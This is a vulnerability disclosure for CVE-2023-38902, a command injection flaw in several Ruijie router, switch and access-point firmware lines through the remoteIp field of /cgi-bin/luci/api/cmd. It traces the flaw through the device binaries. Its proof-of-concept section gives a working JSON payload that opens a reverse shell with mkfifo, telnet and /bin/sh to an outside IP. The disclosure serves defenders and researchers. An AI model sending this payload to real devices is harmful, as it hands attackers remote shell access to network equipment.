Headline
CVE-2023-38902: CVE ruijie report
A command injection vulnerability in RG-EW series home routers and repeaters v.EW_3.0(1)B11P219, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P219, RG-EG series business VPN routers v.EG_3.0(1)B11P219, EAP and RAP series wireless access points v.AP_3.0(1)B11P219, and NBC series wireless controllers v.AC_3.0(1)B11P219 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /cgi-bin/luci/api/cmd via the remoteIp field.
CVE-ID
CVE-2023-38902
Information
Vendor of the products: Ruijie Networks
Vendor’s website: https://www.ruijienetworks.com/
Reported by: Wang Jincheng([email protected]) ,He Nan([email protected])
Affected products: RG-EW Series Routers and Repeaters, RG-NBS and RG-S1930 Series Switches, RG-EG Series business VPN Routers, RG-EAP and RG-RAP Series Wireless APs, RG-NBC Series Wireless Controllers
Affected firmware version: EW_3.0(1)B11P219, SWITCH_3.0(1)B11P219, EG_3.0(1)B11P219, AP_3.0(1)B11P219, AC_3.0(1)B11P219
Firmware download address: ReyeeOS219
Overview
A command injection vulnerability in RG-EW series routers and repeaters v.EW_3.0(1)B11P219, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P219, RG-EG series business VPN routers v.EG_3.0(1)B11P219, RG-EAP and RG-RAP series wireless access points v.AP_3.0(1)B11P219, and RG-NBC series wireless controllers v.AC_3.0(1)B11P219 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /cgi-bin/luci/api/cmd via the remoteIp field.
Vulnerability details
Analyzing the /usr/lib/lua/luci/modules/cmd.lua file reveals that operation types such as devConfig or devSta and operators such as get or set can be arbitrarily combined into different method fields. For instance, when selecting the devConfig.get method, it triggers the doParams(params) function. The params here is the JSON data sent by the POST request. Subsequently, during the invocation of the fetch function, it ultimately triggers the uf_client_call function from /usr/lib/libunifyframe.so. Following this, the data will be transmitted via socket to /usr/sbin/unifyframe-sgi.elf.
In the /usr/lib/libunifyframe.so file, it is documented that the value of remoteIp is parsed from a1[5], where a1 represents the base address of the JSON data object. Moreover, a1 here is of type DWORD* (four bytes here), making a1[5] equivalent to *(a1+20), representing the remoteIp field.
Within the /usr/sbin/unifyframe-sgi.elf file, there exists a command injection vulnerability. The first formatting character %s in the snprintf function corresponds to *(a1+20), which represents the value of the params.remoteIp field in the POST request. This value is user-controllable, ultimately leading to the execution of arbitrary commands when the ufm_popen function is invoked.
Poc
Send the following POST request to /cgi-bin/luci/api/cmd.
{ "method": "devConfig.get", "params": { "module": "123", "remoteIp": "$(mkfifo /tmp/test;telnet 192.168.45.203 6666 0</tmp/test|/bin/sh > /tmp/test)", "data": { "kkk": “abc” } } }
Attack Demonstration
Related news
An issue in RG-EW series home routers and repeaters v.EW_3.0(1)B11P204, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P218, RG-EG series business VPN routers v.EG_3.0(1)B11P216, EAP and RAP series wireless access points v.AP_3.0(1)B11P218, and NBC series wireless controllers v.AC_3.0(1)B11P86 allows a remote attacker to execute arbitrary code via the unifyframe-sgi.elf component in sub_40DA38.